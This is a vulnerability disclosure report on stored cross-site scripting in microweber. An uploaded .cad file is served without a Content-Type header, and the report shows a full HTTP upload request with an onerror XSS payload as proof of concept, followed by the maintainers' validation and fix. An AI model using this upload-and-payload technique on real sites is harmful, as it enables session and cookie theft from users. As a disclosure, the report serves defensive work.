Cross-site scripting - Stored via upload ".cad" file in microweber/microweber

Valid

Reported on

Apr 27th 2022

Description

When user upload file with .cad extension in white-list, server will stored .cad file at userfiles/media/default/, so we can direct access. Becase when access this file, server not reponse with Content-type header, so this file can execute javascript code as Content-type: text/html.

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------160328176018575625273778825362
Content-Length: 615
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/microweber/admin/content/0/edit
Cookie: laravel_session=VtYsoItyj8nMr4HL6c9jgGhCckyCIvM0KefRFBVP; csrf-token-data=%7B%22value%22%3A%22g3SBhsqNBbpRl3ondmilLAqrPEssVIV9GQCfWH7k%22%2C%22expiry%22%3A1651077488795%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//127.0.0.1/microweber/admin/content/0/edit; mw-back-to-live-edit=true; show-sidebar-layouts=0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="name"

xss.cad
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunk"

0
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunks"

1
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror="alert(window.origin)"/>
-----------------------------160328176018575625273778825362--

PoC Image

Upload .cad file
image

Server do not reponse with Content-type header
image

Access .cad file and XSS image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a year ago
Peter Ivanov modified the Severity from Critical to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.15 with commit 89c8f5 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1157 has been validated
Nhien.IT
a year ago

Researcher

Hi @maintainer,

Why this vulnerability was reduced to low level?

Nhien.IT
a year ago

Researcher

Hi @admin @maintainer,

Can I get CVE for this report?

to join this conversation